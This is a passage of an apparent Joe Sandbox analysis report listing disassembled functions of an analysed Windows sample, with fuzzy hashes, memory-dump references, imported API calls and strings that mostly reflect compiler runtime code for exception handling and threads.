Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
Instruction ID: 484a8881b9aa00dc4e7ec999e718d32e402ab6c3e9444e9c2811dfcdd8ccfa10
Opcode Fuzzy Hash: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
Instruction Fuzzy Hash: 87410632B052918EEB14DF26D808BB9BB91FB48B84F898535DE0D9B700EA38F515CB10

Function 00007FF75F8C9F90 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
Instruction ID: 417b8021a80e1d3141ea3a883025363499f26f2ee5dc180f2450d650b7440336
Opcode Fuzzy Hash: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
Instruction Fuzzy Hash: 4E417C72E1874687EB9D8E29E4143793A91B794389FB48239DB098E7C0CE3DE645CB41

Function 00007FF75F98CA80 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b664bc92486b94774e2d03a715eaf1ac27868edddb3aa6ccb711c1054b19e62e
Instruction ID: 22147cb3567b17bc0efc51355249cd26c172aba7cc8abb1fbb939aa00e9bc071
Opcode Fuzzy Hash: b664bc92486b94774e2d03a715eaf1ac27868edddb3aa6ccb711c1054b19e62e
Instruction Fuzzy Hash: A241A732B59E8685EA21BF2DE4400FDE364AB497A4F9C4131EE8D87369CF2CE445C760

Function 00007FF75F8E0870 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 310cf0d5d7753a0825e04fbd76d15a37fc27de77506eaa8c39906b8b90229593
Instruction ID: 32d0324d0f962649c403a441999e184db085bf0808d57962d8a42494f8877458
Opcode Fuzzy Hash: 310cf0d5d7753a0825e04fbd76d15a37fc27de77506eaa8c39906b8b90229593
Instruction Fuzzy Hash: 26311B33B1458187EA20BE29D048BF9F691EB80B90F9C8539DB9E4B7C4DE2DE855D710

Function 00007FF75F9D1760 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0dd75849ad9a8622f8407dff4195338a571a6b28b5630b93c08fde665f15614
Instruction ID: c4ce7f320f6ac98e6b333e03a5cac9d5029f32ae1182004737e2197444279aa0
Opcode Fuzzy Hash: a0dd75849ad9a8622f8407dff4195338a571a6b28b5630b93c08fde665f15614
Instruction Fuzzy Hash: 93411797D0EEC507F3D65A784D6D0A96FD1EB92E007AED07BC384C21DBEF5928808661

Function 00007FF75F9D1788 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc8e2c36a9a77949a0ce3ce955f3c4533d9386945cff67f7bbebd70835b3263
Instruction ID: 0db793cbc130693102c0ce60643e8632a69415236bf417aa4f5992b09ef44ac8
Opcode Fuzzy Hash: 9bc8e2c36a9a77949a0ce3ce955f3c4533d9386945cff67f7bbebd70835b3263
Instruction Fuzzy Hash: 4E311497D0DEC50BF3D65A784D6D0AA7FD1EB92E047AEC07BC284C21DBAE5928408661

Function 00007FF75F9D1868 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5badb1f551a1dc5dff83950e103f866b31b39bfed2660cd819394cf53cf34ef
Instruction ID: 0b05eed090b462187ded3ac6837d7b6b2c125dc2780d57c6a4d48c2fc59d37ef
Opcode Fuzzy Hash: f5badb1f551a1dc5dff83950e103f866b31b39bfed2660cd819394cf53cf34ef
Instruction Fuzzy Hash: 2A216797C0DEC10BF3D6A978896D0F96F91DB93D047AE4077C384C218BAE5E18458761

Function 00007FF75F98F0C0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93911a5bcf6dc6d46fe3ca431bcdc04620c5882bef696c400fe60b32c80ffbc2
Instruction ID: 096f3ad1619adec67ebb4394ef6090af279bc6bdf30a5b51d6462520bdd6c679
Opcode Fuzzy Hash: 93911a5bcf6dc6d46fe3ca431bcdc04620c5882bef696c400fe60b32c80ffbc2
Instruction Fuzzy Hash: 0D21A076A16F9989EB14DFA6E8810EC77B4F749BDCB441126EE4D53B1DDF38C0908250

Function 00007FF75F8E1940 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab075291c5626fefdf75033fda537bb27fb1278482499d65bb1056527ff6b6a4
Instruction ID: 232c89810ccebb824c9cdc8fee492b13569d72f524f5d61aa232c9f2fd513431
Opcode Fuzzy Hash: ab075291c5626fefdf75033fda537bb27fb1278482499d65bb1056527ff6b6a4
Instruction Fuzzy Hash: 91F08673A19A8485CB10AF29E444469A7A4FB5CBD4B98A035EE8D5B718CE3CD451CB10

Function 00007FF75F9D1918 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b35e1b5f6a629d6a7a56c5a219b4f95b7861e3c92cf6fbf46a5b912a6fa943
Instruction ID: 60b5f0ef64b8fbde8ed7c0794c9ef0f5fd589a9a0894af37fec25db7c968cbd5
Opcode Fuzzy Hash: 08b35e1b5f6a629d6a7a56c5a219b4f95b7861e3c92cf6fbf46a5b912a6fa943
Instruction Fuzzy Hash: F1F03797D0DEC64BF3D619B8582E05A7FC1AB92D0C79D807BD384C22CF9F1928404715

Function 00007FF75F8CB039 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c780cca8185bbb1400c716ca8c8d3d8fc60e0f30509476beeefa4faa19091d10
Instruction ID: 2b685872291316edf6ba2821b64153e42807bf5e4634ab5f271a7a67cc680de1
Opcode Fuzzy Hash: c780cca8185bbb1400c716ca8c8d3d8fc60e0f30509476beeefa4faa19091d10
Instruction Fuzzy Hash: BBA0022395FD4180E3441B00AD151B0A22CD706308B68A0328158E10558F6CD2D06154

Function 00007FF75F8D3850 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 116fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF75F8D3968

Part of subcall function 00007FF75F8BE670: strlen.MSVCRT ref: 00007FF75F8BE709
Part of subcall function 00007FF75F8BE670: memcpy.MSVCRT ref: 00007FF75F8BE722
Part of subcall function 00007FF75F8BE670: free.MSVCRT ref: 00007FF75F8BE72D

fwrite.MSVCRT ref: 00007FF75F8D38DA
fputs.MSVCRT ref: 00007FF75F8D38F4
fwrite.MSVCRT ref: 00007FF75F8D3915
free.MSVCRT ref: 00007FF75F8D3925
fputs.MSVCRT ref: 00007FF75F8D3941
abort.MSVCRT ref: 00007FF75F8D3977
fwrite.MSVCRT ref: 00007FF75F8D399C
fwrite.MSVCRT ref: 00007FF75F8D39E6
fputs.MSVCRT ref: 00007FF75F8D39F8
fputc.MSVCRT ref: 00007FF75F8D3A0C

Strings

what(): , xrefs: 00007FF75F8D39DF
terminate called recursively, xrefs: 00007FF75F8D3992
terminate called without an active exception, xrefs: 00007FF75F8D395E
terminate called after throwing an instance of ', xrefs: 00007FF75F8D38CA

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fwrite$fputs$free$abortfputcmemcpystrlen
String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 360841300-808685626
Opcode ID: ef8d5e62435b848e70d940158ae6fe90ce459ba793606d3db35fe2bce993bec3
Instruction ID: 3a25fe29c78a7d70095c9c5fe94f6501765bcbddd5f3cf462eaab032b0ac5335
Opcode Fuzzy Hash: ef8d5e62435b848e70d940158ae6fe90ce459ba793606d3db35fe2bce993bec3
Instruction Fuzzy Hash: 5641D221F18A8251FA10BB62E5293F996559F85B84FCC403AE90D8F3DADF2DF4119372

Function 00007FF75F8C0540 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF75F8C0550
GetFileAttributesW.KERNEL32 ref: 00007FF75F8C0571
wcslen.MSVCRT ref: 00007FF75F8C05AF
wcslen.MSVCRT ref: 00007FF75F8C05BA
wcslen.MSVCRT ref: 00007FF75F8C05C5
malloc.MSVCRT ref: 00007FF75F8C05D5
wcscat.MSVCRT ref: 00007FF75F8C0608
wcslen.MSVCRT ref: 00007FF75F8C065B
wcslen.MSVCRT ref: 00007FF75F8C066E
wcscat.MSVCRT ref: 00007FF75F8C0684
_errno.MSVCRT ref: 00007FF75F8C0690
_errno.MSVCRT ref: 00007FF75F8C06A0
_errno.MSVCRT ref: 00007FF75F8C06B0
_errno.MSVCRT ref: 00007FF75F8C06BF

Strings

\, xrefs: 00007FF75F8C0673

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errnowcslen$wcscat$AttributesFilemalloc
String ID: \
API String ID: 426074236-2967466578
Opcode ID: b182f80caeade51041412301e2105172a5513fe7e352059671e245029b8fee72
Instruction ID: 14b7f744647d06c869bce66591ebb6a455c2d6ae038f28e0cd6cbcbdc4624a49
Opcode Fuzzy Hash: b182f80caeade51041412301e2105172a5513fe7e352059671e245029b8fee72
Instruction Fuzzy Hash: 3231A051A2838244FB64BF6598297F8E290AF84B94FCC4131DA5D4F2C6CF7CB4A4A631

Function 00007FF75F8CD570 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 87libraryloadermemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF75F8CCEE0: calloc.MSVCRT ref: 00007FF75F8CCF87

TlsAlloc.KERNEL32 ref: 00007FF75F8CD5AD
abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F56
abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F5C
GetModuleHandleA.KERNEL32 ref: 00007FF75F998FAD
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FCC
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FDF

Strings

kernel32.dll, xrefs: 00007FF75F998FA6
AddVectoredExceptionHandler, xrefs: 00007FF75F998FC2
RemoveVectoredExceptionHandler, xrefs: 00007FF75F998FCE
once %p is %ld, xrefs: 00007FF75F8CD5FE

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: AddressProcabort$AllocHandleModulecalloc
String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 3654027789-2209695033
Opcode ID: 1120053f0c8ee25a2c5971867fed38ff3f13a51433c79c255e2a31e5cb112621
Instruction ID: 0f722181dda7489ff8a8d8ef8876dcff147c623f96e14c2cfc2264aa811f9652
Opcode Fuzzy Hash: 1120053f0c8ee25a2c5971867fed38ff3f13a51433c79c255e2a31e5cb112621
Instruction Fuzzy Hash: 3131AF32E0AB8685EA51BF1AB8092F8A394AF45794FDC1131CD4D8B369DF3CB495D320

Function 00007FF75F8CD120 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 49libraryloadermemoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF75F8CD124
abort.MSVCRT ref: 00007FF75F998F50
abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F56
abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F5C
GetModuleHandleA.KERNEL32 ref: 00007FF75F998FAD
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FCC
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FDF

Strings

kernel32.dll, xrefs: 00007FF75F998FA6
AddVectoredExceptionHandler, xrefs: 00007FF75F998FC2
RemoveVectoredExceptionHandler, xrefs: 00007FF75F998FCE

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: abort$AddressProc$AllocHandleModule
String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 129120984-3889795909
Opcode ID: 7d72271dd47eaa126999cd38e69fafefc643d3913e058229b02e07d1f52875f6
Instruction ID: c1e2fd59f7a8d2ba22962485714b514ae5867423c66508f3096c05200df946e1
Opcode Fuzzy Hash: 7d72271dd47eaa126999cd38e69fafefc643d3913e058229b02e07d1f52875f6
Instruction Fuzzy Hash: 25115E61E1AF8681EA40BB29FC492E4A3E4BF49754FD81532D98C87379DF3CE0958310

Function 00007FF75F8BFA80 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF75F8BFB55
abort.MSVCRT ref: 00007FF75F8BFB5B
RtlUnwindEx.KERNEL32 ref: 00007FF75F8BFC71

Strings

CCG , xrefs: 00007FF75F8BFAEE
CCG!, xrefs: 00007FF75F8BFB48
CCG", xrefs: 00007FF75F8BFAE2
CCG!, xrefs: 00007FF75F8BFAA9

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: bc4f4f503dc56429e8e8aec229598feaf93dbdd8e1389cc6958ec640c7e7554b
Instruction ID: 009d1a46d0088845c509daaa436fbb1f9d304b51db436602ba94444b4f2a79ae
Opcode Fuzzy Hash: bc4f4f503dc56429e8e8aec229598feaf93dbdd8e1389cc6958ec640c7e7554b
Instruction Fuzzy Hash: 2151C033A08B8082E7609B55E4946EDB360F789B84F988236EE8D17758DF3CE891C704

Function 00007FF75F8CEB10 Relevance: 15.2, APIs: 10, Instructions: 191threadinjectionsynchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 00007FF75F8CEB7D

Part of subcall function 00007FF75F8CD570: TlsAlloc.KERNEL32 ref: 00007FF75F8CD5AD

TlsGetValue.KERNEL32 ref: 00007FF75F8CEBA2
SetEvent.KERNEL32 ref: 00007FF75F8CEBEA
SetEvent.KERNEL32 ref: 00007FF75F8CEC5A
SuspendThread.KERNEL32 ref: 00007FF75F8CECAC
WaitForSingleObject.KERNEL32 ref: 00007FF75F8CECB8
GetThreadContext.KERNEL32 ref: 00007FF75F8CECD5
SetThreadContext.KERNEL32 ref: 00007FF75F8CECF1
SetEvent.KERNEL32 ref: 00007FF75F8CED19
ResumeThread.KERNEL32 ref: 00007FF75F8CED2B

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
